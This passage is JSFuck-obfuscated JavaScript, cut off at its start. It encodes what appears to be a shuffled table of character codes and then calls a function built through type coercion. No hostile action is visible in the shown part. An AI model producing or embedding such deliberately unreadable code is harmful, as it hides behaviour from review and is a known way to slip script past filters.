+!![])+(+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(+!![])+(+!![])+(!![]+!![])+![]+(+!![])+(+[])+(!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![])+![]+(+!![])+(+[])+(!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![])+![]+(+!![])+(!![]+!![])+(+[])+![]+(+!![])+(+!![])+(!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![])+(!![]+!![]+!![])+![]+(!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![])+(+[])+![]+(!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(+[])+![]+(!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![])+![]+(+!![])+(!![]+!![])+(!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(+!![])+(+[])+(!![]+!![]+!![]+!![])+![]+(+!![])+(+[])+(+[])+![]+(+!![])+(+!![])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![])+![]+(+!![])+(+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![])+(+!![])+![]+(!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(+!![])+(+[])+(!![]+!![]+!![]+!![]+!![]+!![])+![]+(+!![])+(+!![])+(!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![])+(+!![])+![]+(!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(+!![])+(+[])+(!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(!![]+!![]+!![]+!![]+!![]+!![])+(!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![])+![]+(+!![])+(!![]+!![])+(!![]+!![]+!![]))[(![]+[])[!![]+!![]+!![]]+(+[![]]+[][(![]+[])[+!![]]+(!![]+[])[+[]]][([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([][[]]+[])[+!![]]+(![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[!![]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+(!![]+[])[!![]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+(+[![]]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+!![]]]+([]+[][(!![]+[])[!![]+!![]+!![]]+([][[]]+[])[+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([![]]+[][[]])[+!![]+[+[]]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]]())[!![]+!![]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+(![]+[])[+!![]])()([][[]]))[+!![]+[+[]]]+(![]+[])[!![]+!![]]+([![]]+[][[]])[+!![]+[+[]]]+(!![]+[])[+[]]](![])+([]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[!![]+!![]]])()))[([]+[][(!![]+[])[!![]+!![]+!![]]+([][[]]+[])[+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([![]]+[][[]])[+!![]+[+[]]]+(!![]+[])[!![]+!![]+!![]]+(![]+[])[!![]+!![]+!![]]]())[!![]+!![]+!![]]+(!![]+[][(![]+[])[+!![]]+(!![]+[])[+[]]])[+!![]+[+[]]]+([![]]+[][[]])[+!![]+[+[]]]+([][[]]+[])[+!![]]]([]))


--------------------------------------------------------------------------------